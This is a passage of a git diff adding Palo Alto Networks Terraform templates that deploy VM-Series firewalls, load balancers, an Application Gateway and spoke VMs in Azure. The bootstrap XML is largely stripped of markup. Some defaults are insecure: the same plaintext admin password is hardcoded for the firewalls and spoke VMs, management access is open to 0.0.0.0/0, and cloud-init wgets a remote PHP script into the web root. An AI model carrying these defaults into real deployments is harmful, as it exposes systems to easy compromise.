+ name = "${var.spoke1_prefix}-lb" + type = "private" + sku = "Standard" + probe_ports = [80] + frontend_ports = [80] + backend_ports = [80] + protocol = "Tcp" + enable_floating_ip = false + subnet_id = module.spoke1_vnet.vnet_subnets[0] + private_ip_address = var.spoke1_internal_lb_ip + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Create spoke2 resource group, spoke2 VNET, spoke2 VM + +resource "azurerm_resource_group" "spoke2_rg" { + name = "${var.global_prefix}${var.spoke2_prefix}-rg" + location = var.location +} + +module "spoke2_vnet" { + source = "./modules/spoke_vnet/" + name = "${var.spoke2_prefix}-vnet" + address_space = var.spoke2_vnet_cidr + subnet_prefixes = var.spoke2_subnet_cidrs + remote_vnet_rg = azurerm_resource_group.transit.name + remote_vnet_name = module.vnet.vnet_name + remote_vnet_id = module.vnet.vnet_id + route_table_destinations = 
var.spoke_udrs + route_table_next_hop = [var.fw_internal_lb_ip] + location = var.location + resource_group_name = azurerm_resource_group.spoke2_rg.name +} + +module "spoke2_vm" { + source = "./modules/spoke_vm/" + name = "${var.spoke2_prefix}-vm" + vm_count = var.spoke2_vm_count + subnet_id = module.spoke2_vnet.vnet_subnets[0] + availability_set_id = "" + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + username = var.spoke_username + password = var.spoke_password + tags = var.tags + location = var.location + resource_group_name = azurerm_resource_group.spoke2_rg.name +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/terraform.tfvars b/azure/transit_2fw_2spoke_common/terraform.tfvars new file mode 100644 index 00000000..2f122c28 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/terraform.tfvars @@ -0,0 +1,43 @@ +#fw_license = "byol" # Uncomment 1 fw_license to select VM-Series licensing mode +#fw_license = "bundle1" +#fw_license = "bundle2" + +global_prefix = "" # Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription +location = "eastus" + +# ----------------------------------------------------------------------- +# VM-Series resource group variables + +fw_prefix = "vmseries" # Adds prefix name to all resources created in the firewall resource group +fw_count = 2 +fw_panos = "9.0.1" +fw_nsg_prefix = "0.0.0.0/0" +fw_username = "paloalto" +fw_password = "Pal0Alt0@123" +fw_internal_lb_ip = "10.0.2.100" + +# ----------------------------------------------------------------------- +# Transit resource group variables + +transit_prefix = "transit" # Adds prefix name to all resources created in the transit vnet's resource group +transit_vnet_cidr = "10.0.0.0/16" +transit_subnet_names = ["mgmt", "untrust", "trust"] +transit_subnet_cidrs = ["10.0.0.0/24", "10.0.1.0/24", "10.0.2.0/24"] + +# ----------------------------------------------------------------------- +# Spoke resource group variables + +spoke1_prefix = "spoke1" # Adds prefix name to all resources created in spoke1's resource group +spoke1_vm_count = 2 +spoke1_vnet_cidr = "10.1.0.0/16" +spoke1_subnet_cidrs = ["10.1.0.0/24"] +spoke1_internal_lb_ip = "10.1.0.100" + +spoke2_prefix = "spoke2" # Adds prefix name to all resources created in spoke2's resource group +spoke2_vm_count = 1 +spoke2_vnet_cidr = "10.2.0.0/16" +spoke2_subnet_cidrs = ["10.2.0.0/24"] + +spoke_username = "paloalto" +spoke_password = "Pal0Alt0@123" +spoke_udrs = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"] \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common/variables.tf b/azure/transit_2fw_2spoke_common/variables.tf new file mode 100644 index 00000000..4899c169 --- /dev/null +++ b/azure/transit_2fw_2spoke_common/variables.tf @@ -0,0 +1,129 @@ +variable location { + description = "Enter a location" +} + +variable fw_prefix { + description = "Prefix to add to all resources added in the firewall resource group" + default = "" +} + +variable fw_license { + description = "VM-Series license: byol, bundle1, or bundle2" + # default = "byol" + # default = "bundle1" + # default = "bundle2" +} + +variable global_prefix { + description = "Prefix to add to all resource groups created. 
This is useful to create unique resource groups within a shared Azure subscription" +} +#----------------------------------------------------------------------------------------------------------------- +# Transit VNET variables + +variable transit_prefix { +} + +variable transit_vnet_cidr { +} + +variable transit_subnet_names { + type = list(string) +} + +variable transit_subnet_cidrs { + type = list(string) +} + +#----------------------------------------------------------------------------------------------------------------- +# VM-Series variables + +variable fw_count { +} + +variable fw_nsg_prefix { +} + +variable fw_panos { +} + +variable fw_username { +} + +variable fw_password { +} + +variable fw_internal_lb_ip { +} + +#----------------------------------------------------------------------------------------------------------------- +# Spoke variables + +variable spoke_username { +} + +variable spoke_password { +} + +variable spoke_udrs { +} + +variable spoke1_prefix { + description = "Prefix to add to all resources added in spoke1's resource group" +} + +variable spoke1_vm_count { +} + +variable spoke1_vnet_cidr { +} + +variable spoke1_subnet_cidrs { + type = list(string) +} + +variable spoke1_internal_lb_ip { +} + +variable spoke2_prefix { + description = "Prefix to add to all resources added in spoke2's resource group" +} + +variable spoke2_vm_count { +} + +variable spoke2_vnet_cidr { +} + +variable spoke2_subnet_cidrs { + type = list(string) +} + +variable tags { + description = "The tags to associate with newly created resources" + type = map(string) + + default = {} +} + +#----------------------------------------------------------------------------------------------------------------- +# Azure environment variables + +variable client_id { + description = "Azure client ID" + default = "" +} + +variable client_secret { + description = "Azure client secret" + default = "" +} + +variable subscription_id { + description = "Azure subscription ID" + default = "" +} + +variable tenant_id { + description = "Azure tenant ID" + default = "" +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf new file mode 100644 index 00000000..c66ebfe6 Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/GUIDE.pdf differ diff --git a/azure/transit_2fw_2spoke_common_appgw/README.md b/azure/transit_2fw_2spoke_common_appgw/README.md new file mode 100644 index 00000000..01101669 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/README.md @@ -0,0 +1,60 @@ +# 2 x VM-Series / Public LB / Internal LB / AppGW / 2 x Spoke VNETs + +This is an extension of the Terraform template located at [**transit_2fw_2spoke_common**](https://github.com/wwce/terraform/tree/master/azure/transit_2fw_2spoke_common). + +Terraform creates 2 VM-Series firewalls deployed in a transit VNET with two connected spoke VNETs (via VNET peering). The VM-Series firewalls secure all ingress/egress to and from the spoke VNETs. All traffic originating from the spokes is routed to an internal load balancer in the transit VNET's trust subnet. All inbound traffic from the internet is sent through a public load balancer or an application gateway (both are deployed). The Application Gateway is configured to load balance HTTP traffic on port 80. + +N.B. - The template can take 15+ minutes to complete due to the Application Gateway deployment time. When complete, the FQDN of the Application Gateway is included in the output. 
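For readers skimming this diff: the piece that puts the firewalls in the inbound web path is the Application Gateway module call in fw_common.tf (shown in full later in this diff). Its backend pool is simply the firewalls' untrust-NIC private IPs, so HTTP arriving on port 80 is terminated on the AppGW and handed to a VM-Series before it can reach a spoke. Trimmed excerpt:

```
# Excerpt from fw_common.tf later in this diff: the AppGW's backend pool is the
# list of VM-Series untrust private IPs exported by the vmseries module.
module "common_appgw" {
  source              = "./modules/appgw/"
  location            = var.location
  resource_group_name = azurerm_resource_group.common_fw.name
  subnet_appgw        = module.vnet.vnet_subnets[3]        # 4th transit subnet ("gateway" in terraform.tfvars)
  fw_private_ips      = module.common_fw.nic1_private_ip
}
```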
+ +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/azure/transit_2fw_2spoke_common/GUIDE.pdf) for more information. + +
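The spoke-to-firewall steering described above is implemented inside the repo's ./modules/spoke_vnet module, driven by the route_table_destinations and route_table_next_hop arguments in spokes.tf. As a minimal standalone sketch of the same idea (resource names, resource group, and location below are illustrative, not the module's internals), a user-defined route that forces spoke traffic through the firewalls' internal load balancer frontend (10.0.2.100 in the shipped terraform.tfvars) looks roughly like this:

```
# Illustrative only -- the real template builds these routes inside ./modules/spoke_vnet.
resource "azurerm_route_table" "spoke1" {
  name                = "spoke1-rt"              # hypothetical name
  location            = "centralus"
  resource_group_name = "example-spoke1-rg"      # hypothetical resource group
}

resource "azurerm_route" "default_via_fw" {
  name                   = "default-to-vmseries"
  resource_group_name    = "example-spoke1-rg"
  route_table_name       = azurerm_route_table.spoke1.name
  address_prefix         = "0.0.0.0/0"           # one of the spoke_udrs destinations
  next_hop_type          = "VirtualAppliance"
  next_hop_in_ip_address = "10.0.2.100"          # fw_internal_lb_ip from terraform.tfvars
}
```

Each prefix listed in spoke_udrs ("0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16") gets a route of this shape, and the route table is associated with the spoke subnet, so both internet-bound and spoke-to-spoke traffic hairpins through the VM-Series.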
+ +## Prerequisites +* Valid Azure Subscription +* Access to Azure Cloud Shell + +
+ +## How to Deploy +### 1. Setup & Download Build +In the Azure Portal, open Azure Cloud Shell and run the following (**Bash only**). +``` +# Accept VM-Series EULA for desired license type (BYOL, Bundle1, or Bundle2) +$ az vm image terms accept --urn paloaltonetworks:vmseries1::9.0.1 + +# Download repo & change directories to the Terraform build +$ git clone https://github.com/wwce/terraform; cd terraform/azure/transit_2fw_2spoke_common_appgw +``` + +### 2. Edit terraform.tfvars +Open terraform.tfvars and uncomment one value for fw_license that matches your license type from step 1. + +``` +$ vi terraform.tfvars +``` + +

+Your terraform.tfvars should look like this before proceeding + +
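(The screenshot referenced above is images/tfvars.png, which does not render in this diff.) As a sketch, assuming the BYOL option was accepted in step 1, the top of terraform.tfvars would read:

```
fw_license = "byol"        # leave exactly one of the three lines uncommented
#fw_license = "bundle1"
#fw_license = "bundle2"
```

Only one fw_license line may be active; the variable has no default in variables.tf, so leaving all three commented makes terraform plan prompt interactively for a value.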

+ +### 3. Deploy Build +``` +$ terraform init +$ terraform apply +``` + +
+ +## How to Destroy +Run the following to destroy the build. +``` +$ terraform destroy +``` + +
+ +## Support Policy +The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml new file mode 100644 index 00000000..47185aa0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/bootstrap.xml @@ -0,0 +1,1058 @@ + + + + + + + + + yes + no + yes + no + + + updates.paloaltonetworks.com + + + + + wednesday + 01:02 + download-only + + + + + US/Pacific + + yes + yes + + + + 8.8.8.8 + 4.2.2.2 + + + fw1 + + + + yes + + + FQDN + + fw1 + paloalto + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + + + + yes + + + + + + + + + + no + + allow-health-probe + + no + + + yes + no + + + + + + + + no + + allow-health-probe + + no + + + yes + no + + + + + + + + + + 3 + 5 + wait-recover + + + + + no + no + yes + no + no + no + no + no + no + no + no + + + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + + + 10 + 10 + 30 + 110 + 30 + 110 + 200 + 20 + 120 + + + + + + + 10.0.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + trust-vr + + + None + + + no + any + 2 + + 10 + 10.1.0.0/16 + + + + + + + trust-vr + + + None + + + no + any + 2 + + 10 + 10.2.0.0/16 + + + + + + + + + + + + + + + + ethernet1/2 + + + 10 + 10 + 30 + 110 + 30 + 110 + 200 + 20 + 120 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 168.63.129.16/32 + + + + + + + untrust-vr + + + None + + + no + any + 2 + + 10 + 0.0.0.0/0 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.1.0.0/16 + + + + + + + 10.0.2.1 + + + None + + + no + any + 2 + + ethernet1/2 + 10 + 10.2.0.0/16 + + + + + + + + + + + + + + + + + yes + + + no + + + no + + + no + + + no + + + + + + + + + + + + ethernet1/2 + + + no + + + + + ethernet1/1 + + + no + + + + + + ethernet1/2 + ethernet1/1 + vlan + loopback + tunnel + + + + untrust-vr + trust-vr + + + + + + + + + + + 22 + + + + + + + + + + + + + + + any + + + any + + + azure-lb-probe + + + any 
+ + + any + + + any + + + any + + + any + + + any + + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + web-browsing + + + application-default + + + any + + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + application-default + + + any + + allow + + + universal + + trust + + + trust + + + spoke1-vnet + spoke2-vnet + + no + + any + + + any + + + spoke1-vnet + spoke2-vnet + + no + + ping + ssh + web-browsing + + + application-default + + + any + + allow + no + yes + no + no + + + + universal + + trust + + + untrust + + + spoke1-vnet + spoke2-vnet + + no + + any + + + any + + + any + + no + + apt-get + ntp + ping + ssl + web-browsing + + + application-default + + + any + + allow + no + yes + no + no + + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + + + + + + + + + + + + ipv4 + + untrust + + + untrust + + any + any + + azure-lb-probe + + + any + + no + This NAT policy prevents the public load balancer's health probes from being NATed. + + + ipv4 + + untrust + + + untrust + + ethernet1/1 + service-http + + any + + + any + + no + + + + ethernet1/2 + + + + + spoke1-intlb + 80 + + NATs inbound request to internal LB in spoke1 + + + ipv4 + + untrust + + + untrust + + ethernet1/1 + tcp-22 + + any + + + any + + no + + + + ethernet1/2 + + + + + spoke2-vm + 22 + + NATs inbound request to jump server in Spoke 1. + + + ipv4 + + trust + + + untrust + + any + any + + any + + + any + + + + + ethernet1/1 + + + + no + + + + + + + + + + + + + +
+ + 168.63.129.16/32 + + azure-resource + + + + 10.1.0.4 + + azure-resource + + + + 10.2.0.4 + + azure-resource + + + + 10.1.0.0/16 + + azure-resource + + + + 10.2.0.0/16 + + azure-resource + + + + 10.1.0.100 + + azure-resource + + +
+ + + + + + + + + + color20 + + + color13 + + + color24 + + + color22 + + + + + + + + + + + + + + + + + + + + + + + + +
+
+
+
+ + + + * + + + yes + + + + + $1$uoktdfcd$ETFyCMQoc9Atk1GyysHYU1 + + + yes + + + + + + yes + 8 + + + + + + + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + +
diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt new file mode 100644 index 00000000..44878949 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/config/init-cfg.txt @@ -0,0 +1,9 @@ +type=dhcp-client +ip-address= +default-gateway= +netmask= +ipv6-address= +ipv6-default-gateway= +dhcp-accept-server-hostname=yes +dns-primary=8.8.8.8 +dns-secondary=4.2.2.2 \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore new file mode 100644 index 00000000..c96a04f0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/content/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/license/authcodes new file mode 100644 index 00000000..e69de29b diff --git a/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore new file mode 100644 index 00000000..c96a04f0 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/bootstrap_files/software/.gitignore @@ -0,0 +1,2 @@ +* +!.gitignore \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_common.tf b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf new file mode 100644 index 00000000..e35b4dd1 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/fw_common.tf @@ -0,0 +1,134 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create resource group for FWs, FW NICs, and FW LBs + +resource "azurerm_resource_group" "common_fw" { + name = "${var.global_prefix}-${var.fw_prefix}-rg" + location = var.location +} + +#----------------------------------------------------------------------------------------------------------------- +# Create storage account and file share for bootstrapping + +resource "random_string" "main" { + length = 15 + min_lower = 5 + min_numeric = 10 + special = false +} + +resource "azurerm_storage_account" "main" { + name = random_string.main.result + account_tier = "Standard" + account_replication_type = "LRS" + location = azurerm_resource_group.common_fw.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +module "common_fileshare" { + source = "./modules/azure_bootstrap/" + name = "${var.fw_prefix}-bootstrap" + quota = 1 + storage_account_name = azurerm_storage_account.main.name + storage_account_key = azurerm_storage_account.main.primary_access_key + local_file_path = "bootstrap_files/" +} + + +#----------------------------------------------------------------------------------------------------------------- +# Create VM-Series. For every fw_name entered, an additional VM-Series instance will be deployed. 
+ +module "common_fw" { + source = "./modules/vmseries/" + name = "${var.fw_prefix}-vm" + vm_count = var.fw_count + username = var.fw_username + password = var.fw_password + panos = var.fw_panos + license = var.fw_license + nsg_prefix = var.fw_nsg_prefix + avset_name = "${var.fw_prefix}-avset" + subnet_mgmt = module.vnet.vnet_subnets[0] + subnet_untrust = module.vnet.vnet_subnets[1] + subnet_trust = module.vnet.vnet_subnets[2] + nic0_public_ip = true + nic1_public_ip = true + nic2_public_ip = false + nic1_backend_pool_ids = [module.common_extlb.backend_pool_id] + nic2_backend_pool_ids = [module.common_intlb.backend_pool_id] + bootstrap_storage_account = azurerm_storage_account.main.name + bootstrap_access_key = azurerm_storage_account.main.primary_access_key + bootstrap_file_share = module.common_fileshare.file_share_name + bootstrap_share_directory = "None" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name + dependencies = [ + module.common_fileshare.completion + ] +} + +#----------------------------------------------------------------------------------------------------------------- +# Create public load balancer. Load balancer uses firewall's untrust interfaces as its backend pool. + +module "common_extlb" { + source = "./modules/lb/" + name = "${var.fw_prefix}-public-lb" + type = "public" + sku = "Standard" + probe_ports = [22] + frontend_ports = [80, 22, 443] + backend_ports = [80, 22, 443] + protocol = "Tcp" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Create internal load balancer. Load balancer uses firewall's trust interfaces as its backend pool + +module "common_intlb" { + source = "./modules/lb/" + name = "${var.fw_prefix}-internal-lb" + type = "private" + sku = "Standard" + probe_ports = [22] + frontend_ports = [0] + backend_ports = [0] + protocol = "All" + subnet_id = module.vnet.vnet_subnets[2] + private_ip_address = var.fw_internal_lb_ip + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name +} + +# Create Application Gateway. 
Load balancer uses firewall's untrust interface IPs as its backend pool + +module "common_appgw" { + source = "./modules/appgw/" + location = var.location + resource_group_name = azurerm_resource_group.common_fw.name + subnet_appgw = module.vnet.vnet_subnets[3] + fw_private_ips = module.common_fw.nic1_private_ip +} + +#----------------------------------------------------------------------------------------------------------------- +# Outputs to terminal + +output AppGW { + value = "http://${module.common_appgw.appgw_fqdn}" +} + +output EXT-LB { + value = "http://${module.common_extlb.public_ip[0]}" +} + +output MGMT-FW1 { + value = "https://${module.common_fw.nic0_public_ip[0]}" +} + +output MGMT-FW2 { + value = "https://${module.common_fw.nic0_public_ip[1]}" +} + +output SSH-TO-SPOKE2 { + value = "ssh ${var.spoke_username}@${module.common_extlb.public_ip[0]}" +} diff --git a/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf new file mode 100644 index 00000000..4ee6701d --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/fw_vnet.tf @@ -0,0 +1,16 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create Transit VNET +resource "azurerm_resource_group" "transit" { + name = "${var.global_prefix}-${var.transit_prefix}-rg" + location = var.location +} + +module "vnet" { + source = "./modules/vnet/" + name = "${var.transit_prefix}-vnet" + address_space = var.transit_vnet_cidr + subnet_names = var.transit_subnet_names + subnet_prefixes = var.transit_subnet_cidrs + location = var.location + resource_group_name = azurerm_resource_group.transit.name +} diff --git a/azure/transit_2fw_2spoke_common_appgw/images/diagram.png b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png new file mode 100644 index 00000000..45f1d146 Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/images/diagram.png differ diff --git a/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png new file mode 100644 index 00000000..afd57343 Binary files /dev/null and b/azure/transit_2fw_2spoke_common_appgw/images/tfvars.png differ diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf new file mode 100644 index 00000000..202714da --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/main.tf @@ -0,0 +1,75 @@ +#### AppGW2 #### +resource "random_id" "storage_account" { + byte_length = 2 +} + +resource "azurerm_public_ip" "appgw" { + name = "appgw" + location = var.location + resource_group_name = var.resource_group_name + domain_name_label = "appgw-${lower(random_id.storage_account.hex)}" + allocation_method = "Dynamic" +} + +resource "azurerm_application_gateway" "appgw" { + name = "appgw" + location = var.location + resource_group_name = var.resource_group_name + + sku { + name = "WAF_Medium" + tier = "WAF" + capacity = 2 + } + + waf_configuration { + enabled = "true" + firewall_mode = "Prevention" + rule_set_type = "OWASP" + rule_set_version = "3.0" + } + + gateway_ip_configuration { + name = "appgw" + subnet_id = var.subnet_appgw + } + + frontend_port { + name = "http" + port = 80 + } + + frontend_ip_configuration { + name = "appgw" + public_ip_address_id = azurerm_public_ip.appgw.id + } + + backend_address_pool { + name = "BackendPool" + ip_addresses = var.fw_private_ips + + } + + http_listener { + name = "http" + 
frontend_ip_configuration_name = "appgw" + frontend_port_name = "http" + protocol = "Http" + } + + backend_http_settings { + name = "http" + cookie_based_affinity = "Disabled" + port = 80 + protocol = "Http" + request_timeout = 1 + } + + request_routing_rule { + name = "http" + rule_type = "Basic" + http_listener_name = "http" + backend_address_pool_name = "BackendPool" + backend_http_settings_name = "http" + } +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf new file mode 100644 index 00000000..97cb2d85 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/outputs.tf @@ -0,0 +1,3 @@ +output appgw_fqdn { + value = azurerm_public_ip.appgw.fqdn +} diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf new file mode 100644 index 00000000..c3dbfab8 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/modules/appgw/variables.tf @@ -0,0 +1,17 @@ +variable "location" { + description = "Location of the resource group to place App Gateway in." +} + +variable "resource_group_name" { + description = "Name of the resource group to place App Gateway in." +} + +variable "subnet_appgw" { + description = "AppGW Subnet" +} + +variable "fw_private_ips" { + description = "list of private IP addresses from the deployed FW" + type = list(string) + default = null +} \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf new file mode 100644 index 00000000..1a5c1f7a --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/modules/azure_bootstrap/main.tf @@ -0,0 +1,40 @@ + + +resource "random_string" "randomstring" { + length = 15 + min_lower = 5 + min_numeric = 10 + special = false +} + +resource "azurerm_storage_share" "main" { + name = "${var.name}${random_string.randomstring.result}" + storage_account_name = var.storage_account_name + quota = var.quota +} + +resource "null_resource" "upload" { +provisioner "local-exec" { + command = < + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl new file mode 100644 index 00000000..1d02e945 --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/scripts/web_startup.yml.tpl @@ -0,0 +1,10 @@ +#cloud-config + +runcmd: + - sudo apt-get update -y + - sudo apt-get install -y php + - sudo apt-get install -y apache2 + - sudo apt-get install -y libapache2-mod-php + - sudo rm -f /var/www/html/index.html + - sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/azure/transit_2fw_2spoke_common/scripts/showheaders.php + - sudo systemctl restart apache2 \ No newline at end of file diff --git a/azure/transit_2fw_2spoke_common_appgw/spokes.tf b/azure/transit_2fw_2spoke_common_appgw/spokes.tf new file mode 100644 index 00000000..a4bf874b --- /dev/null +++ b/azure/transit_2fw_2spoke_common_appgw/spokes.tf @@ -0,0 +1,97 @@ +#----------------------------------------------------------------------------------------------------------------- +# Create spoke1 resource group, spoke1 VNET, spoke1 internal LB, (2) spoke1 VMs + +resource "azurerm_resource_group" "spoke1_rg" { + name = "${var.global_prefix}-${var.spoke1_prefix}-rg" + location = var.location +} + +module "spoke1_vnet" { + source = "./modules/spoke_vnet/" + name = "${var.spoke1_prefix}-vnet" + address_space = var.spoke1_vnet_cidr + subnet_prefixes = var.spoke1_subnet_cidrs + remote_vnet_rg = azurerm_resource_group.transit.name + remote_vnet_name = module.vnet.vnet_name + remote_vnet_id = module.vnet.vnet_id + route_table_destinations = var.spoke_udrs + route_table_next_hop = [var.fw_internal_lb_ip] + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +data "template_file" "web_startup" { + template = "${file("${path.module}/scripts/web_startup.yml.tpl")}" +} + +module "spoke1_vm" { + source = "./modules/spoke_vm/" + name = "${var.spoke1_prefix}-vm" + vm_count = var.spoke1_vm_count + subnet_id = module.spoke1_vnet.vnet_subnets[0] + availability_set_id = "" + backend_pool_ids = [module.spoke1_lb.backend_pool_id] + custom_data = base64encode(data.template_file.web_startup.rendered) + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + username = var.spoke_username + password = var.spoke_password + tags = var.tags + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +module "spoke1_lb" { + source = "./modules/lb/" + name = "${var.spoke1_prefix}-lb" + type = "private" + sku = "Standard" + probe_ports = [80] + frontend_ports = [80] + backend_ports = [80] + protocol = "Tcp" + enable_floating_ip = false + subnet_id = module.spoke1_vnet.vnet_subnets[0] + private_ip_address = var.spoke1_internal_lb_ip + location = var.location + resource_group_name = azurerm_resource_group.spoke1_rg.name +} + +#----------------------------------------------------------------------------------------------------------------- +# Create spoke2 resource group, spoke2 VNET, spoke2 VM + +resource "azurerm_resource_group" "spoke2_rg" { + name = "${var.global_prefix}-${var.spoke2_prefix}-rg" + location = var.location +} + +module "spoke2_vnet" { + source = "./modules/spoke_vnet/" + name = "${var.spoke2_prefix}-vnet" + address_space = var.spoke2_vnet_cidr + subnet_prefixes = var.spoke2_subnet_cidrs + remote_vnet_rg = azurerm_resource_group.transit.name + remote_vnet_name = module.vnet.vnet_name + remote_vnet_id = module.vnet.vnet_id + 
